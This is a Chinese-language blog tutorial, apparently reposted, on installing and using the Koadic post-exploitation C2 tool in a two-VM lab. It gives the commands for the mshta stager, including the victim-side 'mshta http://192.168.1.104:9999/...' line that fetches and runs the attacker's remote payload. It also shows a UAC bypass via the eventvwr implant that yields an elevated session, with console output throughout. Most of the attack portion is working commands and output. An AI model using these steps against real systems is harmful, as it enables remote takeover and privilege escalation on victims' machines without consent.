当前位置 : 主页 > 网页制作 > HTTP/TCP >

Koadic的安装和使用---http c2远控工具

来源:互联网 收集:自由互联 发布时间:2021-06-16
Koadic的安装和使用 2017.11.26 11:02 字数 690 阅读 611 评论 0 喜欢 2 概述 Koadic是DEFCON分型出来的一个后渗透工具,主要通过vbscript、jscript进行大部分操作 废话不多说开始演示 环境准备 我准

Koadic的安装和使用

2017.11.26 11:02 字数 690 阅读 611评论 0  

概述

Koadic是DEFCON分型出来的一个后渗透工具,主要通过vbscript、jscript进行大部分操作
废话不多说开始演示

环境准备

我准备的是两台虚拟机一台kali就是攻击机器
一台windows7 64位就是受害者了

安装

安装很简单
git clone https://github.com/zerosum0x0/koadic.git
之后安装依赖
cd koadic/
pip install -r requirements.txt

使用

运行
./koadic

.
                           /      _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# 

首先我们得知道这个工具的几个概念

  • Stagers 就是在你攻击的机器上生成的payload的种类
  • Implants 就是当你控制机器后可以进行的操作

具体Stagers和Implants你可以看它的github页面
https://github.com/zerosum0x0/koadic

接着我们执行
use stager/js/mshta
就是使用mshta这个stager
之后设置本机的端口和ip,进行本地监听
你可以输入info命令来查看要设置的参数
set LHOST 192.168.1.104
set LPORT 9999
接着运行
run

(koadic: sta/js/mshta)# run [+] Spawned a stager at http://192.168.1.104:9999/BYhBU [>] mshta http://192.168.1.104:9999/BYhBU 

因为是后渗透工具,所以不管怎么说你肯定能在你控制的电脑上执行一条命令
在受害者机器上执行
mshta http://192.168.1.104:9999/BYhBU
我的话直接打开一个cmd执行就好了
接着会有一个python字符的坑,会出现下面这个错

(koadic: sta/js/mshta)# ---------------------------------------- Exception happened during processing of request from (‘192.168.1.110‘, 49159) Traceback (most recent call last): File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ self.handle() File "/root/koadic/core/handler.py", line 90, in handle return BaseHTTPRequestHandler.handle(self) File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle self.handle_one_request() File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request method() File "/root/koadic/core/handler.py", line 169, in do_POST self.session.parse_user_info(data) File "/root/koadic/core/session.py", line 56, in parse_user_info data = data.decode().split("~~~") UnicodeDecodeError: ‘ascii‘ codec can‘t decode byte 0xe4 in position 65: ordinal not in range(128) ---------------------------------------- [!] Zombie 0: Timed out. 

就是下面这个错误
UnicodeDecodeError: ‘ascii‘ codec can‘t decode byte 0xe4 in position 65: ordinal not in range(128)
你只要把字符编码换成utf-8就好了
怎么做呢看下面
首先退出程序
打开下面这个文件
vim koadic

添加上

import sys reload(sys) sys.setdefaultencoding(‘utf-8‘) 

总的文件是下面这个样子的

#!/usr/bin/env python import sys reload(sys) sys.setdefaultencoding(‘utf-8‘) # Copyright (c) 2016 - 2017 RiskSense, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use the software except in compliance with the License. # # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. # Disclaimer: # Usage of Koadic for attacking targets without prior mutual consent is illegal. # It is the end user‘s responsibility to obey all applicable local, state, # federal, and international laws. Developers assume no liability and are not # responsible for any misuse or damage caused by this program. __version_info__ = (0, 8) __version__ = "x".join(map(str, __version_info__)) __license__ = "Apache 2.0" __credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"] if __name__ == "__main__": import core.shell banner = open("data/banner.txt", "rb").read().decode("unicode_escape") shell = core.shell.Shell(banner, __version__) shell.run() 

之后重新进行上面的操作就不会报错了

.
                           /      _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

        -{ COM Command & Control }-
      Windows Post-Exploitation Tools
             Endless Intellect

            ~[ Version:  0x8 ]~
            ~[ Stagers:    4 ]~
            ~[ Implants:  29 ]~

(koadic: sta/js/mshta)# use stager/js/mshta (koadic: sta/js/mshta)# set LHOST 192.168.1.104 [+] LHOST => 192.168.1.104 (koadic: sta/js/mshta)# run [+] Spawned a stager at http://192.168.1.104:9999/N435X [>] mshta http://192.168.1.104:9999/N435X [+] Zombie 0: Staging new connection (192.168.1.110) [+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 (koadic: sta/js/mshta)# 

之后我们进行权限提升也就是uac bypass

输入zombies来查看我们控制的机器

(koadic: sta/js/mshta)# zombies ID IP STATUS LAST SEEN --- --------- ------- ------------ 0 192.168.1.110 Alive 2017-11-25 21:27:46 Use "zombies ID" for detailed information about a session. 

输入zombies 0可以查看这台机器的详细信息

(koadic: sta/js/mshta)# zombies 0 ID: 0 Status: Alive Last Seen: 2017-11-25 21:28:42 IP: 192.168.1.110 User: WIN-HK90RUM6L1B\bboysoul Hostname: WIN-HK90RUM6L1B Primary DC: Unknown OS: Microsoft Windows 7 专业版 OSArch: 64-bit Elevated: No User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Session Key: f4d7735b8a9d45a5a74ed5a63a164421 JOB NAME STATUS ERRNO ---- --------- ------- ------- 

可以看到Elevated这里显示no表示我们没有进行提权
输入
use implant/elevate/bypassuac_eventvwr
查看一下这个模块的信息

(koadic: imp/ele/bypassuac_eventvwr)# info NAME VALUE REQ DESCRIPTION ----- ------------ ---- ------------- PAYLOAD yes run payloads for a list ZOMBIE ALL yes the zombie to target 

这里我们把payload和zombie设置为0,就是表示payload为0不使用,zombie的编号为0
接着run就好了

(koadic: imp/ele/bypassuac_eventvwr)# run [*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created. [+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed. [+] Zombie 1: Staging new connection (192.168.1.110) [+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 

成功
但是注意的是程序新建立了一个链接来bypass所以原来那个zombie连接虽然存在但是还是没有进行提权的用户,新建的那个连接才是进行提权过的用户,不信输入zombie看一下是不是多出了一个链接

(koadic: imp/ele/bypassuac_eventvwr)# zombies ID IP STATUS LAST SEEN --- --------- ------- ------------ 0 192.168.1.110 Alive 2017-11-25 21:43:00 1* 192.168.1.110 Alive 2017-11-25 21:43:00 Use "zombies ID" for detailed information about a session. 

看一下zombie 1的信息

(koadic: imp/ele/bypassuac_eventvwr)# zombies 1 ID: 1 Status: Alive Last Seen: 2017-11-25 21:45:35 IP: 192.168.1.110 User: WIN-HK90RUM6L1B\bboysoul* Hostname: WIN-HK90RUM6L1B Primary DC: Unknown OS: Microsoft Windows 7 专业版 OSArch: 64-bit Elevated: YES! User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Session Key: c42dec18786a47f2bc4ee023dc8f69bd JOB NAME STATUS ERRNO ---- --------- ------- ------- 

是提权成功的提权成功之后的机器我们可以使用implant里所有的模块,具体的模块自己研究吧

上一篇:2 HTTP和HTTPS
下一篇:numpy模块
网友评论